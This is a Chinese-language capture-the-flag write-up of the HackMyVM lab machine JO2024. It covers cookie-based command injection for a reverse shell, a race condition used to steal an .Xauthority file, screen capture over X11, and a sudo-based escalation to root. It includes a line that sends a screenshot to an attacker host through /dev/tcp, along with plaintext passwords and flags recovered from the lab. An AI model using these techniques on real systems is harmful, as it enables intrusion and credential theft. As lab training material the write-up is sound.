HackMyVM-JO2024靶机详解WP

信息收集

服务探测

常规80端口

❯ nmap -sS -sV -p- -A $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 15:35 CST
Nmap scan report for 192.168.56.114
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-title: Paris 2024 Olympic Games
|_http-server-header: Apache/2.4.61 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...........................
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT     ADDRESS
1   0.47 ms 172.20.32.1
2   1.06 ms 192.168.56.114

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.43 seconds

简单看了一下，好像有关于巴黎奥运会的，在页面找了一下没有突破的地方

简单扫一下目录，发现有个preferences.php

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,zip,htm,txt,php  -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.114
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,htm,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.114/img/]
/index.php            (Status: 200) [Size: 7812]
/index.php            (Status: 200) [Size: 7812]
/preferences.php      (Status: 200) [Size: 3163]
Progress: 28404 / 28410 (99.98%)
===============================================================
Finished
===============================================================

看来要用burpsuite抓包设置一下cookie，伪造amin的cookie

抓到包，好像是个序列化后的数据，正好前几天上课学了thinkphp框架的rec反序列化漏洞，实践一下

好吧，实际上只需要修改一下执行的命令，即可反弹shell

不需要构造payload来修改序列化数据，可以观察到这个序列化的数据会被执行在网页中

那改成nc命令，再进行base64编码回去

这样就成功拿到webshell了

用户提权

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.114] 35296
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@jo2024:/$

在用户家目录发现一个backup的bash脚本

www-data@jo2024:/home/vanity$ cat backup
#!/bin/bash

SRC="/home/vanity"
DEST="/backup"

rm -rf /backup/{*,.*}

echo "Starting copy..."
find "$SRC" -maxdepth 1 -type f ! -name user.txt | while read srcfile; do
    destfile="$DEST${srcfile#$SRC}"
    mkdir -p "$(dirname "$destfile")"
    dd if="$srcfile" of="$destfile" bs=4M

    md5src=$(md5sum "$srcfile" | cut -d ' ' -f1)
    md5dest=$(md5sum "$destfile" | cut -d ' ' -f1)
    if [[ "$md5src" != "$md5dest" ]]; then
        echo "MD5 mismatch for $srcfile :("
    fi
    chmod 700 "$destfile"

done


echo "Copy complete. All files verified !"

大概率会定时运行脚本，传了个pspy64上去，等了一段时间，果然执行了

www-data@jo2024:/tmp$ wget 192.168.56.102/pspy64
--2024-12-14 09:20:38--  http://192.168.56.102/pspy64
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  --.-KB/s    in 0.1s

2024-12-14 09:20:38 (26.4 MB/s) - ‘pspy64’ saved [3104768/3104768]

www-data@jo2024:/tmp$ chmod +x pspy
www-data@jo2024:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/12/14 09:22:01 CMD: UID=1000  PID=6052   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6051   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6053   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6054   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6055   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6058   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6057   | /bin/bash /home/vanity/backup
2024/12/14 09:22:01 CMD: UID=1000  PID=6056   | /bin/bash /home/vanity/backup

www-data@jo2024:/$ id 1000
uid=1000(vanity) gid=1000(vanity) groups=1000(vanity),100(users)

该脚本用于将 /home/vanity 目录中的所有文件（除了 user.txt）复制到 /backup 目录，并在复制完成后对比 MD5 校验和以确保文件没有损坏

uid我看着还是vanity用户的，那咋利用嘞

backup文件也没有修改权限，不过看了一下用户家目录有个.Xauthority

这是X Window System用于验证用户身份的文件。这个文件存储了用户会话的凭据信息，以便用户可以访问X Window系统

说白了就是用户在GUI模式下登入会生成此类文件

那我们去/backup目录里下瞅瞅有没有

www-data@jo2024:/home/vanity$ cd /backup
www-data@jo2024:/backup$ ls -al
total 40
drwxr-xr-x  2 vanity vanity 4096 Dec 14 09:57 .
drwxr-xr-x 19 root   root   4096 Jul 29 16:04 ..
-rwx------  1 vanity vanity  158 Dec 14 09:57 .Xauthority
-rwx------  1 vanity vanity  220 Dec 14 09:57 .bash_logout
-rwx------  1 vanity vanity 3526 Dec 14 09:57 .bashrc
-rwx------  1 vanity vanity   35 Dec 14 09:57 .dmrc
-rwx------  1 vanity vanity   36 Dec 14 09:57 .lesshst
-rwx------  1 vanity vanity  807 Dec 14 09:57 .profile
-rwx------  1 vanity vanity    8 Dec 14 09:57 .xprofile
-rwx------  1 vanity vanity  557 Dec 14 09:57 backup

有，但是没有权限，那个bash脚本在备份完后设置了700权限，也就是只有文件所有者有读写执行

但是我们抢先一步读取，比如在脚本还没有设置权限的时候读去，尝试竞争读出相关文件

写个脚本循环，一直读取/backup/.Xauthority尝试能否读出来

www-data@jo2024:/backup$ while true;do cat .Xauthority >>/tmp/log 2>/dev/null ;sleep 0.01;done
----------------------------------------------------------------------------
www-data@jo2024:/$ cd /tmp
www-data@jo2024:/tmp$ ls -al
total 3044
drwxrwxrwt  2 root     root        4096 Dec 14 10:00 .
drwxr-xr-x 19 root     root        4096 Jul 29 16:04 ..
-rw-r--r--  1 www-data www-data     474 Dec 14 10:03 log
-rwxr-xr-x  1 www-data www-data 3104768 Dec 12 10:21 pspy64

拿到log文件了，在hackTricks找到一篇利用文章

6000 - 渗透测试 X11 | HackTricks — 6000 - Pentesting X11 | HackTricks

尝试利用一下，文章使用xdd先看一下hexdump格式，但是靶机上没有xdd就不执行了，不过传个busybox也可以

www-data@jo2024:/tmp$ w
 10:09:44 up  1:39,  1 user,  load average: 0.35, 0.23, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vanity   tty7     :0               08:30    1:39m  0.00s  0.09s /usr/bin/lxsession -s LXDE -e LXDE

我们可以看到在localhost:0运行了lxsession

lxsession是LXDE桌面环境中的会话管理器，用于管理用户的登录会话和启动用户桌面环境的进程。它提供了一个简单的用户界面，使用户可以管理他们的会话和启动应用程序。lxsession是在Linux系统下使用的一个用于图形用户界面的会话管理器。

我们可以利用xwd进行屏幕截取

不过在此之前需要先设置XAUTHORITY环境变量为你拿到的log文件

www-data@jo2024:/tmp$ export XAUTHORITY=/tmp/log
www-data@jo2024:/tmp$ xwd -root -screen -silent -display :0 > screenshot.xwd
www-data@jo2024:/tmp$ ls
log  pspy64  screenshot.xwd
www-data@jo2024:/tmp$ cat screenshot.xwd> /dev/tcp/192.168.56.102/1234
----------------------------------------------------------
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 1234>screenshot.xwd
listening on [any] 1234 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.114] 48788
┌──(kali㉿kali)-[~]
└─$ convert screenshot.xwd screenshot.png

xwd命令是一个在Unix和Linux系统中使用的截屏工具，用来捕获X Window系统上的窗口内容并保存为XWD格式的文件。XWD格式是X Window系统专用的窗口内容描述格式。通过xwd命令可以实现对屏幕、窗口等内容进行截图和保存。

这里就要切到GUI界面了，看一下图片

尝试利用ssh连接一下，用户名为vanity密码为xd0oITR93KIQDbiD

❯ ssh vanity@$ip
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux jo2024.hmv 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
vanity@jo2024:~$ cat user.txt
e2cb9d6e0899cde91130ca4b37139021
vanity@jo2024:~$ sudo -l
Matching Defaults entries for vanity on jo2024:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vanity may run the following commands on jo2024:
    (ALL : ALL) NOPASSWD: /usr/local/bin/php-server.sh
vanity@jo2024:~$ cat /usr/local/bin/php-server.sh
#!/bin/bash

/usr/bin/php -t /opt -S 0.0.0.0:8000

并且发现有sudo权限，那就简单了

这个脚本是利用php在/opt目录下开个服务，端口监听8000

本来的思路是想在/opt目录下放个rev.php直接反弹个shell

发现/opt没有权限进入，哈哈😅

访问了一下8000端口

****根据页面提示，咱要不抓包试一下

这里使用POST请求get_protected_content.php页面，并且携带csrfToken

我的理解就是你在访问192.168.56.114:8000的同时，帮你以管理员的身份访问了get_protected_content.php不过内容不显示出来

密码为LightningBolt123

vanity@jo2024:~$ su
Password:
root@jo2024:/home/vanity# id
uid=0(root) gid=0(root) groups=0(root)
root@jo2024:/home/vanity# cd /root
root@jo2024:~# ls
root.txt
root@jo2024:~# cat root.txt
cbd60dab37bc85e1f7ea4b5c9c4eed90

结束啦🎉